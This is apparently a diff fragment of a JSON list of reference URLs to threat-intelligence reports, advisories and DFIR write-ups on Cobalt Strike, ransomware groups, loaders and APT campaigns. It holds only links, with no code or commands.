- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
- "https://www.youtube.com/watch?v=y65hmcLIWDY",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
- "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
- "https://zero.bs/cobaltstrike-beacons-analyzed.html",
- "https://www.arashparsa.com/catching-a-malware-with-no-name/",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
- "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink",
- "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
- "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf",
- "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#",
- "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
- "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/",
- "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://twitter.com/TheDFIRReport/status/1356729371931860992",
- "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/",
- "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
- "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/",
- "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
- "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
- "https://twitter.com/redcanary/status/1334224861628039169",
- "https://isc.sans.edu/diary/rss/28934",
- "https://blog.group-ib.com/apt41-world-tour-2021",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
- "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
- "https://thedfirreport.com/2022/03/07/2021-year-in-review/",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
+ "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/",
+ "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
+ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://github.com/chronicle/GCTI",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2",
+ "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/",
+ "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
+ "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://community.riskiq.com/article/c88cf7e6",
- "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
- "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
- "https://skyblue.team/posts/scanning-virustotal-firehose/",
- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
- "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
+ "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
+ "https://isc.sans.edu/diary/rss/28664",
+ "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/",
+ "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
+ "https://www.mandiant.com/resources/apt41-us-state-governments",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
+ "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection",
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
+ "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/",
+ "https://isc.sans.edu/diary/rss/28752",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
+ "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/",
+ "https://twitter.com/Unit42_Intel/status/1458113934024757256",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
- "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/",
- "https://twitter.com/MBThreatIntel/status/1412518446013812737",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://web.br.de/interaktiv/ocean-lotus/en/",
- "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://cert.gov.ua/article/703548",
+ "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://twitter.com/TheDFIRReport/status/1356729371931860992",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://twitter.com/Unit42_Intel/status/1461004489234829320",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://netresec.com/?b=214d7ff",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
+ "https://www.mandiant.com/media/10916/download",
+ "https://www.mandiant.com/resources/sabbath-ransomware-affiliate",
+ "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/",
+ "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
"https://www.arashparsa.com/hook-heaps-and-live-free/",
"https://www.qurium.org/alerts/targeted-malware-against-crph/",
- "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
- "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes",
- "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
- "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://isc.sans.edu/diary/28636",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.inde.nz/blog/different-kind-of-zoombomb",
- "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/",
- "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
- "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/",
- "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
"https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage",
- "https://www.cynet.com/understanding-squirrelwaffle/",
- "https://blog.cobaltstrike.com/",
- "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation",
- "http://www.secureworks.com/research/threat-profiles/gold-winter",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/",
- "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
- "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
- "https://isc.sans.edu/diary/rss/28664",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk",
- "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/",
- "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
- "https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3",
- "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929",
- "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468",
- "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
- "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
- "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html",
- "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
- "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
- "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures",
- "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/",
- "https://redcanary.com/blog/gootloader",
- "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
- "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
- "https://blog.zsec.uk/cobalt-strike-profiles/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
- "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
- "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
- "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
- "https://www.mandiant.com/resources/apt41-us-state-governments",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
- "https://paper.seebug.org/1301/",
- "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
- "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://cyber.wtf/2022/03/23/what-the-packer/",
- "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
- "https://www.mandiant.com/resources/defining-cobalt-strike-components",
- "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
- "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/",
- "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/",
- "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
- "https://cert.gov.ua/article/37704",
- "https://malwarebookreports.com/cryptone-cobalt-strike/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
- "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a",
- "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/",
- "https://cert.gov.ua/article/339662",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://www.istrosec.com/blog/apt-sk-cobalt/",
- "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://www.youtube.com/watch?v=gfYswA_Ronw",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf",
- "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang",
- "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
- "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html",
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear",
- "https://isc.sans.edu/diary/rss/28448",
- "https://community.riskiq.com/article/0bcefe76",
- "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20",
- "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
- "https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/",
+ "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
"https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
- "https://www.ic3.gov/Media/News/2021/210823.pdf",
